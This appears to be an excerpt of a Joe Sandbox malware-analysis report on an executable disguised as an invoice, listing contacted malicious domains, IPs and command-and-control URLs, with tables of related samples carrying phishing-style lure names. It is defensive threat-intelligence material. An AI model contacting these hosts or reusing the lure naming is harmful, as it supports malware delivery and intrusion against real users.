http://www.theyogirunner.com/dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=rT959XFbghPJVv5hpca1PvfPcVCtnqQ7MGzQwkslu+qbfaQ1OXZa8AaW+DloN+T+QKhF	0%	Avira URL Cloud	safe
http://www.kladios.com/dp3a/?GR-d=9p/K3n16Mfij3JUlf4zaR/Rujbmkv/CDhZs1M9Rj6A9SEkbuvv/NT9LewVshmGfbFjhm&nPTdU=-ZoHnNt0frfd2Hn	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.closetofaurora.com/dp3a/?GR-d=gKBh5mJw+OBG/cLQbNfpnnQYqc+45jCeSmhHkERkUIltQJh3+jBq8zykiXiJ5ld+SMHF&nPTdU=-ZoHnNt0frfd2Hn	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
www.rebeccannemontgomery.net/dp3a/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.theyogirunner.com	104.232.96.207	true	true	0%, Virustotal, Browse	unknown
www.kladios.com	121.254.178.252	true	true		unknown
closetofaurora.com	162.0.229.108	true	true	0%, Virustotal, Browse	unknown
www.pecon.pro	37.48.65.148	true	true		unknown
shops.myshopify.com	23.227.38.74	true	true		unknown
www.kingguardgroup.com	69.162.102.218	true	true		unknown
natroredirect.natrocdn.com	85.159.66.93	true	true		unknown
www.rebeccannemontgomery.net	35.205.61.67	true	false		unknown
www.closetofaurora.com	unknown	unknown	true		unknown
www.letstrumpbiden.com	unknown	unknown	true		unknown
www.28ji.site	unknown	unknown	true		unknown
www.hireinone.xyz	unknown	unknown	true		unknown
www.goodlukc.com	unknown	unknown	true		unknown
www.oilleakgames.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.kingguardgroup.com/dp3a/?GR-d=+9xVWhQ3YZdKS9LSdJD9Q5IGOGjZWYGRUC/PBrhb5+8EiR866LajmsNw/hU5zOKELtJS&nPTdU=-ZoHnNt0frfd2Hn	true	Avira URL Cloud: safe	unknown
http://www.hireinone.xyz/dp3a/?GR-d=gNGby8oVX6PgZB5GWA7CusOGqzi3GywYGs/3OTvKjB1NulubMkWwqj/edMXwHBCob9Lh&nPTdU=-ZoHnNt0frfd2Hn	true	Avira URL Cloud: safe	unknown
http://www.28ji.site/dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=/zMHFgDZZhoYLr+uNA/LZaIwAqqHNoUyccNHiXKU1Oc8waRhqa0xV5lesUE3sQ0wja+H	true	Avira URL Cloud: safe	unknown
http://www.rebeccannemontgomery.net/dp3a/?GR-d=ayCA4X1Kl09ymHiLnx81tYxQpS3YxUUFxhK9zdH9kq/gCaIMsyBIYQcEhhLQSA14VAsf&nPTdU=-ZoHnNt0frfd2Hn	false	Avira URL Cloud: safe	unknown
http://www.pecon.pro/dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=qfgFr8ieK4pb0oEJahXrwfByJwdYjuIB81dpFpRA2DwOSKuw2QjIPW4nYRzvvZDFGDPJ	true	Avira URL Cloud: safe	unknown
http://www.theyogirunner.com/dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=rT959XFbghPJVv5hpca1PvfPcVCtnqQ7MGzQwkslu+qbfaQ1OXZa8AaW+DloN+T+QKhF	true	Avira URL Cloud: safe	unknown
http://www.kladios.com/dp3a/?GR-d=9p/K3n16Mfij3JUlf4zaR/Rujbmkv/CDhZs1M9Rj6A9SEkbuvv/NT9LewVshmGfbFjhm&nPTdU=-ZoHnNt0frfd2Hn	true	Avira URL Cloud: safe	unknown
http://www.closetofaurora.com/dp3a/?GR-d=gKBh5mJw+OBG/cLQbNfpnnQYqc+45jCeSmhHkERkUIltQJh3+jBq8zykiXiJ5ld+SMHF&nPTdU=-ZoHnNt0frfd2Hn	true	Avira URL Cloud: safe	unknown
www.rebeccannemontgomery.net/dp3a/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	Proforma Invoice and Bank swift-REG.PI-0086547654.exe	false		high
http://www.goodfont.co.kr	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false		high
http://nsis.sf.net/NSIS_Error	Proforma Invoice and Bank swift-REG.PI-0086547654.exe	false		high
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer	raserver.exe, 00000007.00000002.915003619.0000000005342000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	explorer.exe, 00000005.00000000.659286527.0000000002B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
37.48.65.148	www.pecon.pro	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	true
104.232.96.207	www.theyogirunner.com	United States	26658	HENGTONG-IDC-LLCUS	true
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true
69.162.102.218	www.kingguardgroup.com	United States	46475	LIMESTONENETWORKSUS	true
121.254.178.252	www.kladios.com	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	true
162.0.229.108	closetofaurora.com	Canada	22612	NAMECHEAP-NETUS	true
35.205.61.67	www.rebeccannemontgomery.net	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	432567
Start date:	10.06.2021
Start time:	14:34:39
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Proforma Invoice and Bank swift-REG.PI-0086547654.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/4@11/8
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 39% (good quality ratio 36.6%) Quality average: 76.1% Quality standard deviation: 29.5%
HCA Information:	Successful, ratio: 89% Number of executed functions: 100 Number of non-executed functions: 201
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 23.218.209.198, 13.88.21.125, 92.122.145.220, 20.50.102.62, 20.75.105.140, 20.72.88.19, 20.54.26.129, 92.122.213.194, 92.122.213.247, 20.82.209.183 Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, storeedgefd.dsx.mp.microsoft.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37.48.65.148	SHEXD2101127S_ShippingDocument_DkD.xlsx	Get hash	malicious	Browse	www.365shared.com/de92/?Czud=Dpp83lZxpp6l-LP&9rbXut=a5ir/qNYihHZK7f5S5Gjzqg9MzD8+Rrk5lo6Yv8tpKbv5CljNuSL6deZHy/aiAYGeB+7Ug==
	http://jrpgreview.com/uploads/1/3/0/8/130874396/130874396.html#la+escuela+de+los+annales+una+historia+intelectual	Get hash	malicious	Browse	jrpgreview.com/uploads/1/3/0/8/130874396/130874396.html?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYwNDU3OTQxOSwiaWF0IjoxNjA0NTcyMjE5LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycDI5YnJscTdiNGZiZThkb3MxaWU5bzIiLCJuYmYiOjE2MDQ1NzIyMTksInRzIjoxNjA0NTcyMjE5ODA5ODEzfQ.PKldYRigIviI48xiZ9X6fqG6H7Uc1ciIR0sTCWf9tAs&sid=e7473bd8-1f51-11eb-acdb-1f2a73b18557
	D76CA0.exe	Get hash	malicious	Browse	fafa6.com//u5.htm
	5order pdf.exe	Get hash	malicious	Browse	www.missegghostel.com/nk7/
104.232.96.207	Bidding of BMP Project EMMP.99876786.exe	Get hash	malicious	Browse	www.theyogirunner.com/dp3a/?7nH8vbl=rT959XFbghPJVv5hpca1PvfPcVCtnqQ7MGzQwkslu+qbfaQ1OXZa8AaW+AJSO//FT9AUltlmWQ==&7ne0c=sZvXur
104.232.96.207	RFQ - Upgrade Project (PML) 0000052021.exe	Get hash	malicious	Browse	www.theyogirunner.com/dp3a/?Qxo=rT959XFbghPJVv5hpca1PvfPcVCtnqQ7MGzQwkslu+qbfaQ1OXZa8AaW+DloN+T+QKhF&MJBD=FdFp3xAhctetbXf0
23.227.38.74	triage_dropped_file.exe	Get hash	malicious	Browse	www.thealhenab.com/lth/?j2JH=ZcbCehfj8ImupxL5QXnMNvQJWpQCOut0r4CVtnEGIsCNW0r5wSCoLo5XJHu+FOqvsvGw&h4z=6lyDpn60BJx
	triage_dropped_file.exe	Get hash	malicious	Browse	www.closetcouturenc.com/c244/?7n=5jNdhZ_X42i84pV&R48h=fIwE3YcYGsU/TaMiWbUZTKVuiW3FLNuQbGNiC6N+NU/VqYsSC9RgAif2H2ijMVa01tDm
	New Order Vung Ang TPP Viet Nam.exe	Get hash	malicious	Browse	www.thirdgenerationfarms.com/un8c/?z8b=iZspkzE0JnS86&m6=K7pYdtPf1O8pkq5RJpQL9NxmcqWMJU+Ppy9tvWhY4bI/nVqWSKBoLDAkJ4bn6KwKcEveZsCjYw==
	RFQ K1062 PROJECT.exe	Get hash	malicious	Browse	www.universalphonemarket.com/dp3a/?9rMTYd=oPnT&i890b4=EsQWO7Ia6y124haLSppFMR0zJnUPO31SP/r5yW22Lir3snxnGwkzmwrr05Dph4umLPXJ
	qXDtb88hht.exe	Get hash	malicious	Browse	www.essentiallyourscandles.com/p2io/?b0GDi6=Q6Ahtfox&Z8E=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR
	RFQ.exe	Get hash	malicious	Browse	www.offersinabundance.com/qah0/?DX9pb=2LBb2NW4EgpwUlSsFIVwIRF82Hc5jGDJ+WM6RpThXUa68dYBUfl3vB5itNGE1ADRzAPW&UDK49v=0BahA
	Purchase Order.exe	Get hash	malicious	Browse	www.the-plague-doctor.com/ngvm/?Rxo4n8lx=N6t4uij3Bnfz0thkEVBudZCo3324dv5Cau36l6vISK8wiKeRIgYQaeO8WJY3KNcLujaD&6lPt=DBWdatr8OFdXf8
	Telex_Payment.exe	Get hash	malicious	Browse	www.prosperouspromises.com/m3rc/?hTk8tpm=Bux0+evZkpJFouT8m8PiIMbx44EWtE9m7BZzrPnSEWVCGq5LKn1lk3VU9ISrInZ4VXXN&I4=5jxX5BaX4hy8-j8
	QyKNw7NioL.exe	Get hash	malicious	Browse	www.essentiallyourscandles.com/p2io/?m4=PditjTvx4PwX_x-&aBd=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZSDSX8qwPBDW
	IsIMH5zplo.exe	Get hash	malicious	Browse	www.essentiallyourscandles.com/p2io/?n2MLF0Ux=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjoHtKIVmiR&Dj6t=CpStsPY
	ORDER0429.exe	Get hash	malicious	Browse	www.laughouka.com/frf/?Eh=AGFauOqDv/HfRUzmq/TYMSxJ1o0aeAJ0t++JXinCgh+bUPEVFp3ANvy2jAng90emT1+B&khu=KdEXebCXyH3li
	Remittance advice.exe	Get hash	malicious	Browse	www.sargentapparel.com/juue/?r2Jl2P=vpWqaX6JOu8ZsHn8drLqQMe6+aZ+RfLKrQwToxuZjGBvWaDLvVh4Sh6JflYKgzLv+7JrBsckEQ==&x4=cHFXwpt8BN7HVxQ
	HQvI0y1Wu4.exe	Get hash	malicious	Browse	www.thecanineharness.com/xkcp/?vPk=e9Pf9tHYEMShWWwNG5UvCshY2ABg45EgX9NuTuHur4caRmP7QuLk0W6lWTxDDONgsjypzNj2jw==&2dW8=8pXh-V4h02hpJ2J
	003 SOA.exe	Get hash	malicious	Browse	www.madflowr.com/hme1/?6l-x=P9Yffdim+7xdt/lqVJ5gYdoJ15fwkx2SxeQc+fgyrtS6VeRlavBDlKdIFlqwKeTohIxC&q450=lHkpfvh8-6gxYnb
	DOC1073.exe	Get hash	malicious	Browse	www.exoticflameinc.com/gqav/?n8W=5jNx5L7xUNvtZH&6lkLL=dhdUouTDULIRA1vaWqhiWs1JEKXkfHXa5gKIxvNKCyR4+v40m5wsnn+GvsBTLiLjgixa
	swift.exe	Get hash	malicious	Browse	www.lkbeautysf.com/uecu/?8pk8=6lcdJHrpYtAxo&mVFd9P=/iJmRKdW9BMnM+S8BsRYOkXrgQbixhsTdtS69weI+Je728AYu647J5oYyHknwqlBvLH0qjZnvw==
	CONTRACT SWIFT.exe	Get hash	malicious	Browse	www.campingquick.com/s5cm/?IBZlYbB=ykmySD41HqpRsFExsLJzaB/DPTfNPkk2Lc0Pz7ATifvot7ncWrGAE7TUgg0cf+ItDyGbmwzT/w==&7no=4hLljrWPCjYL
	PO 4500151298.exe	Get hash	malicious	Browse	www.goldgrandpa.com/dp3a/?VrbDp=GkWHDDYMiWr4Ju0U4teKyAR8hKcpKlGmV2ZHyKwA/bXhSAEvQCtqjiLuXuDi+Fm5YGCW&y0Dt=r0D0w8
	Bidding of BMP Project EMMP.99876786.exe	Get hash	malicious	Browse	www.universalphonemarket.com/dp3a/?7nH8vbl=EsQWO7Ia6y124haLSppFMR0zJnUPO31SP/r5yW22Lir3snxnGwkzmwrr05PpyoilSfXfRBrscw==&7ne0c=sZvXur
	cy.exe	Get hash	malicious	Browse	www.sleepysteeptea.com/zrmt/?Klh8a=p2JDfHUh1&6lux=Ucn9fSZXqSSmkiL0mEOrYo2pHriSzUOrcicofX8z62uvKNxaVT5sdSOEjUogsrUNyPDA

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.kladios.com	RFQ K1062 PROJECT.exe	Get hash	malicious	Browse	121.254.178.252
www.pecon.pro	#U00a0Import Custom Duty invoice & its clearance documents.exe	Get hash	malicious	Browse	185.107.56.200
	PO 4500151298.exe	Get hash	malicious	Browse	82.192.82.228
	AWB DHL 6357297368.exe	Get hash	malicious	Browse	185.107.56.200
	RFQ - Upgrade Project (PML) 0000052021.exe	Get hash	malicious	Browse	185.107.56.200
natroredirect.natrocdn.com	SecuriteInfo.com.Trojan.GenericKD.37066764.6014.exe	Get hash	malicious	Browse	85.159.66.93
	rtgs_2021-06-07_02-01.exe	Get hash	malicious	Browse	85.159.66.93
	RFQ K1062 PROJECT.exe	Get hash	malicious	Browse	85.159.66.93
	PO 4500151298.exe	Get hash	malicious	Browse	85.159.66.93
	Bidding of BMP Project EMMP.99876786.exe	Get hash	malicious	Browse	85.159.66.93
	RFQ - Upgrade Project (PML) 0000052021.exe	Get hash	malicious	Browse	85.159.66.93
	bd729c36_by_Libranalysis.exe	Get hash	malicious	Browse	85.159.66.93
	Remittance Advice pdf.exe	Get hash	malicious	Browse	85.159.66.93
	RCS76393.exe	Get hash	malicious	Browse	85.159.66.93
	newordermx.exe	Get hash	malicious	Browse	85.159.66.93
	Swift001_jpg.exe	Get hash	malicious	Browse	85.159.66.93
	t3R3C0QGKU.exe	Get hash	malicious	Browse	85.159.66.93
	PO_210301.exe.exe	Get hash	malicious	Browse	85.159.66.93
	PO_210224.exe	Get hash	malicious	Browse	85.159.66.93
	VESSEL SPECIFICATION 2021.exe	Get hash	malicious	Browse	85.159.66.93
	SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exe	Get hash	malicious	Browse	85.159.66.93
	Y75vU558UfuGbzM.exe	Get hash	malicious	Browse	85.159.66.93
	Doc_74657456348374.xlsx.exe	Get hash	malicious	Browse	85.159.66.93
	REQUEST FOR QUOTATION.exe	Get hash	malicious	Browse	85.159.66.93
	D0ck7nuQyqLXPRQ.exe	Get hash	malicious	Browse	85.159.66.93
www.theyogirunner.com	Bidding of BMP Project EMMP.99876786.exe	Get hash	malicious	Browse	104.232.96.207
www.theyogirunner.com	RFQ - Upgrade Project (PML) 0000052021.exe	Get hash	malicious	Browse	104.232.96.207
www.kingguardgroup.com	Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Get hash	malicious	Browse	69.162.102.218
	3arZKnr21W.exe	Get hash	malicious	Browse	69.162.102.218
	Bidding of BMP Project EMMP.99876786.exe	Get hash	malicious	Browse	69.162.102.218
shops.myshopify.com	triage_dropped_file.exe	Get hash	malicious	Browse	23.227.38.74
	triage_dropped_file.exe	Get hash	malicious	Browse	23.227.38.74
	New Order Vung Ang TPP Viet Nam.exe	Get hash	malicious	Browse	23.227.38.74
	RFQ K1062 PROJECT.exe	Get hash	malicious	Browse	23.227.38.74
	qXDtb88hht.exe	Get hash	malicious	Browse	23.227.38.74
	RFQ.exe	Get hash	malicious	Browse	23.227.38.74
	Purchase Order.exe	Get hash	malicious	Browse	23.227.38.74
	Telex_Payment.exe	Get hash	malicious	Browse	23.227.38.74
	QyKNw7NioL.exe	Get hash	malicious	Browse	23.227.38.74
	IsIMH5zplo.exe	Get hash	malicious	Browse	23.227.38.74
	ORDER0429.exe	Get hash	malicious	Browse	23.227.38.74
	Remittance advice.exe	Get hash	malicious	Browse	23.227.38.74
	HQvI0y1Wu4.exe	Get hash	malicious	Browse	23.227.38.74
	003 SOA.exe	Get hash	malicious	Browse	23.227.38.74
	DOC1073.exe	Get hash	malicious	Browse	23.227.38.74
	SKMBT_C22421033008180 png.exe	Get hash	malicious	Browse	23.227.38.74
	swift.exe	Get hash	malicious	Browse	23.227.38.74
	CONTRACT SWIFT.exe	Get hash	malicious	Browse	23.227.38.74
	PO 4500151298.exe	Get hash	malicious	Browse	23.227.38.74
	Bidding of BMP Project EMMP.99876786.exe	Get hash	malicious	Browse	23.227.38.74

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LEASEWEB-NL-AMS-01NetherlandsNL	no_response_will_be_considered_as_agreement_email.js	Get hash	malicious	Browse	185.123.60.113
	no_response_will_be_considered_as_agreement_email.js	Get hash	malicious	Browse	185.123.60.113
	invoice.exe	Get hash	malicious	Browse	212.32.237.90
	product_support_agreement_boeing2.js	Get hash	malicious	Browse	185.123.60.113
	product_support_agreement_boeing2.js	Get hash	malicious	Browse	185.123.60.113
	swift 0024182021.exe	Get hash	malicious	Browse	83.149.93.194
	PURCHASE ORDER US-J42169.exe	Get hash	malicious	Browse	83.149.93.194
	U4JZ8cQqvU.exe	Get hash	malicious	Browse	212.32.237.92
	IsIMH5zplo.exe	Get hash	malicious	Browse	212.32.237.90
	most_purchase_agreements_are_contingent_on_which_two_items_property_de.js	Get hash	malicious	Browse	185.123.60.113
	purchase order 20210602 pvt.exe	Get hash	malicious	Browse	83.149.93.194
	most_purchase_agreements_are_contingent_on_which_two_items_property_de.js	Get hash	malicious	Browse	185.123.60.113
	wMKDi0Ss3f.exe	Get hash	malicious	Browse	212.32.237.101
	Payment Advice.exe	Get hash	malicious	Browse	37.48.65.149
	Docs draft comfirm.exe	Get hash	malicious	Browse	83.149.93.194
	purchase order.exe	Get hash	malicious	Browse	83.149.93.194
	GuDCxzqi.exe	Get hash	malicious	Browse	81.171.31.214
	BA-CONTRACT 312000123 SSR ADVICE 31-05-2021.xlsx	Get hash	malicious	Browse	212.32.237.101
	PI.exe	Get hash	malicious	Browse	212.32.237.92
	Swift copy_9808.exe	Get hash	malicious	Browse	81.171.22.6
CLOUDFLARENETUS	Order.exe	Get hash	malicious	Browse	104.21.40.174
	DocumentScanCopy2021_pdf.exe	Get hash	malicious	Browse	104.21.19.200
	RRY0yKj2HM.dll	Get hash	malicious	Browse	104.20.184.68
	SecuriteInfo.com.Trojan.PackedNET.721.2973.exe	Get hash	malicious	Browse	104.23.98.190
	SecuriteInfo.com.Trojan.PackedNET.831.4134.exe	Get hash	malicious	Browse	104.23.98.190
	SWIFT COMMERCIAL DUTY 0218J.exe	Get hash	malicious	Browse	172.67.188.154
	p8Wo6PbOjL.exe	Get hash	malicious	Browse	162.159.130.233
	b7cgnOpObK.exe	Get hash	malicious	Browse	104.21.19.200
	Invoice 8-6-2021.exe	Get hash	malicious	Browse	172.67.188.154
	PO187439.exe	Get hash	malicious	Browse	104.21.81.138
	090009000000090.exe	Get hash	malicious	Browse	104.21.19.200
	Urgent Contract Order GH78566484,pdf.exe	Get hash	malicious	Browse	172.67.188.154
	NEWORDERLIST.exe	Get hash	malicious	Browse	104.21.47.38
	Nr_0052801.exe	Get hash	malicious	Browse	172.67.158.27
	Check 57549.Html	Get hash	malicious	Browse	104.16.19.94
	Invoice_OS169ENG 000003893148.exe	Get hash	malicious	Browse	104.21.19.200
	PO.xlsx	Get hash	malicious	Browse	104.23.98.190
	sat1_0609_2.dll	Get hash	malicious	Browse	104.20.184.68
	Lista e porosive.exe	Get hash	malicious	Browse	162.159.129.233
	00404000004.exe	Get hash	malicious	Browse	172.67.188.154
HENGTONG-IDC-LLCUS	Payment receipt MT103.exe	Get hash	malicious	Browse	146.148.195.215
	000987654345XASD.exe	Get hash	malicious	Browse	216.12.171.50
	Bidding of BMP Project EMMP.99876786.exe	Get hash	malicious	Browse	104.232.96.207
	RFQ - Upgrade Project (PML) 0000052021.exe	Get hash	malicious	Browse	104.232.96.207
	DHL_119045_Receipt document,pdf.exe	Get hash	malicious	Browse	172.87.193.139
	nK8YtaS7db.exe	Get hash	malicious	Browse	146.148.189.230
	pVrqrGltiL.exe	Get hash	malicious	Browse	104.232.64.103
	Proforma Fatura INV98767894.PDF.exe	Get hash	malicious	Browse	107.178.171.41
	GE3hVNHtrK.exe	Get hash	malicious	Browse	104.232.64.103
	PI.exe	Get hash	malicious	Browse	146.148.146.34
	SWIFT COPY.exe	Get hash	malicious	Browse	146.148.146.34
	Bank Details.xlsx	Get hash	malicious	Browse	104.128.125.95
	PROFORMA INVOICE.exe	Get hash	malicious	Browse	103.4.20.241
	dot.dot	Get hash	malicious	Browse	203.76.236.103
	eQLPRPErea.exe	Get hash	malicious	Browse	104.128.125.95
	FTT103634332.exe	Get hash	malicious	Browse	104.128.126.123
	ARBmDNJS7m.exe	Get hash	malicious	Browse	104.128.125.95
	Purchase Order 2021 - 00041.exe	Get hash	malicious	Browse	104.232.96.254
	New order.exe	Get hash	malicious	Browse	104.232.96.254
	SWIFT_png.exe	Get hash	malicious	Browse	220.158.226.143

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsp24F7.tmp\System.dll	Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Get hash	malicious	Browse
	3arZKnr21W.exe	Get hash	malicious	Browse
	Shipping receipt.exe	Get hash	malicious	Browse
	New Order TL273723734533.pdf.exe	Get hash	malicious	Browse
	YZ8OvkljWm.exe	Get hash	malicious	Browse
